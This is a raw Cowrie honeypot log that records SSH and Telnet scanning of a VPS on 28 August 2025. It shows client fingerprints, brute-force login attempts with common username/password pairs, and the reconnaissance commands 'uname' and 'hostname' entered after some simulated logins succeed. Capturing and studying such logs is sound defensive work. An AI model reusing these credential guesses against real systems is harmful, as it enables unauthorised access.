{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:18:43.942697Z","src_ip":"212.227.235.229","session":"77b57bce9ed0"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-28T17:18:44.141967Z","src_ip":"212.227.235.229","session":"77b57bce9ed0"}
{"eventid":"cowrie.session.connect","src_ip":"18.206.121.64","src_port":56622,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b90d4674881","protocol":"ssh","message":"New connection: 18.206.121.64:56622 (1.2.3.4:22) [session: 3b90d4674881]","sensor":"my-vps","timestamp":"2025-08-28T17:18:44.518048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:18:45.372864Z","src_ip":"18.206.121.64","session":"3b90d4674881"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-28T17:18:45.373718Z","src_ip":"18.206.121.64","session":"3b90d4674881"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:47.237139Z","src_ip":"18.206.121.64","session":"3b90d4674881"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:47.942319Z","src_ip":"212.227.235.229","session":"77b57bce9ed0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32911,"dst_ip":"1.2.3.4","dst_port":23,"session":"add0e9240ce0","protocol":"telnet","message":"New connection: 212.227.125.160:32911 (1.2.3.4:23) [session: add0e9240ce0]","sensor":"my-vps","timestamp":"2025-08-28T17:18:52.383150Z"}
{"eventid":"cowrie.session.closed","duration":6.728156089782715,"message":"Connection lost after 6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:18:59.111236Z","src_ip":"212.227.125.160","session":"add0e9240ce0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43607,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9ada20fff66","protocol":"telnet","message":"New connection: 212.227.125.160:43607 (1.2.3.4:23) [session: d9ada20fff66]","sensor":"my-vps","timestamp":"2025-08-28T17:19:10.549505Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37990,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff13efb327f4","protocol":"ssh","message":"New connection: 212.227.235.229:37990 (1.2.3.4:22) [session: ff13efb327f4]","sensor":"my-vps","timestamp":"2025-08-28T17:20:13.907670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:20:13.909379Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:20:14.007759Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678","message":"login attempt [root/12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:20:14.403609Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:20:14.623875Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:20:14.624903Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:20:14.725847Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:20:14.727043Z","src_ip":"212.227.235.229","session":"ff13efb327f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49730,"dst_ip":"1.2.3.4","dst_port":22,"session":"4051b92e78ef","protocol":"ssh","message":"New connection: 212.227.235.229:49730 (1.2.3.4:22) [session: 4051b92e78ef]","sensor":"my-vps","timestamp":"2025-08-28T17:20:16.955309Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:20:17.133525Z","src_ip":"212.227.235.229","session":"4051b92e78ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49742,"dst_ip":"1.2.3.4","dst_port":22,"session":"6be1b8d52d98","protocol":"ssh","message":"New connection: 212.227.235.229:49742 (1.2.3.4:22) [session: 6be1b8d52d98]","sensor":"my-vps","timestamp":"2025-08-28T17:20:17.310425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:20:17.311602Z","src_ip":"212.227.235.229","session":"6be1b8d52d98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T17:20:17.489558Z","src_ip":"212.227.235.229","session":"6be1b8d52d98"}
{"eventid":"cowrie.login.failed","username":"msq","password":"a","message":"login attempt [msq/a] failed","sensor":"my-vps","timestamp":"2025-08-28T17:20:18.024135Z","src_ip":"212.227.235.229","session":"6be1b8d52d98"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:20:19.651690Z","src_ip":"212.227.235.229","session":"6be1b8d52d98"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64616,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6e35963eef4","protocol":"ssh","message":"New connection: 217.72.205.35:64616 (1.2.3.4:22) [session: b6e35963eef4]","sensor":"my-vps","timestamp":"2025-08-28T17:20:45.418941Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:20:45.420040Z","src_ip":"217.72.205.35","session":"b6e35963eef4"}
{"eventid":"cowrie.session.closed","duration":120.01958560943604,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:21:10.569020Z","src_ip":"212.227.125.160","session":"d9ada20fff66"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":54900,"dst_ip":"1.2.3.4","dst_port":22,"session":"55757ff71ec6","protocol":"ssh","message":"New connection: 186.225.142.90:54900 (1.2.3.4:22) [session: 55757ff71ec6]","sensor":"my-vps","timestamp":"2025-08-28T17:22:51.870502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:22:51.872864Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T17:22:52.062540Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.login.success","username":"root","password":"101010*333","message":"login attempt [root/101010*333] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:22:52.830888Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:22:53.230440Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T17:22:53.231270Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:22:53.423924Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:22:53.425000Z","src_ip":"186.225.142.90","session":"55757ff71ec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41382,"dst_ip":"1.2.3.4","dst_port":22,"session":"24497e0169c0","protocol":"ssh","message":"New connection: 212.227.125.160:41382 (1.2.3.4:22) [session: 24497e0169c0]","sensor":"my-vps","timestamp":"2025-08-28T17:22:54.175921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:22:54.176869Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:22:54.257622Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"mohammed","message":"login attempt [mohammed/mohammed] failed","sensor":"my-vps","timestamp":"2025-08-28T17:22:54.667389Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc123","message":"login attempt [mohammed/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:22:55.757758Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd123","message":"login attempt [mohammed/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:22:56.840778Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abcd1234","message":"login attempt [mohammed/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:22:57.923990Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.login.failed","username":"mohammed","password":"abc1234","message":"login attempt [mohammed/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:22:59.008696Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:23:00.092154Z","src_ip":"212.227.125.160","session":"24497e0169c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57005,"dst_ip":"1.2.3.4","dst_port":23,"session":"cffdfd705eaa","protocol":"telnet","message":"New connection: 212.227.125.160:57005 (1.2.3.4:23) [session: cffdfd705eaa]","sensor":"my-vps","timestamp":"2025-08-28T17:23:02.133302Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36800,"dst_ip":"1.2.3.4","dst_port":22,"session":"03a389b2a6c0","protocol":"ssh","message":"New connection: 212.227.235.229:36800 (1.2.3.4:22) [session: 03a389b2a6c0]","sensor":"my-vps","timestamp":"2025-08-28T17:23:09.919344Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:23:09.920098Z","src_ip":"212.227.235.229","session":"03a389b2a6c0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:23:10.024928Z","src_ip":"212.227.235.229","session":"03a389b2a6c0"}
{"eventid":"cowrie.login.failed","username":"solana","password":"123456","message":"login attempt [solana/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:23:10.340222Z","src_ip":"212.227.235.229","session":"03a389b2a6c0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:23:11.447045Z","src_ip":"212.227.235.229","session":"03a389b2a6c0"}
{"eventid":"cowrie.session.closed","duration":16.283539533615112,"message":"Connection lost after 16 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:23:18.416743Z","src_ip":"212.227.125.160","session":"cffdfd705eaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63326,"dst_ip":"1.2.3.4","dst_port":22,"session":"a290bea73f4e","protocol":"ssh","message":"New connection: 212.227.125.160:63326 (1.2.3.4:22) [session: a290bea73f4e]","sensor":"my-vps","timestamp":"2025-08-28T17:24:50.565383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:24:50.567025Z","src_ip":"212.227.125.160","session":"a290bea73f4e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:24:50.647805Z","src_ip":"212.227.125.160","session":"a290bea73f4e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T17:24:51.358321Z","src_ip":"212.227.125.160","session":"a290bea73f4e"}
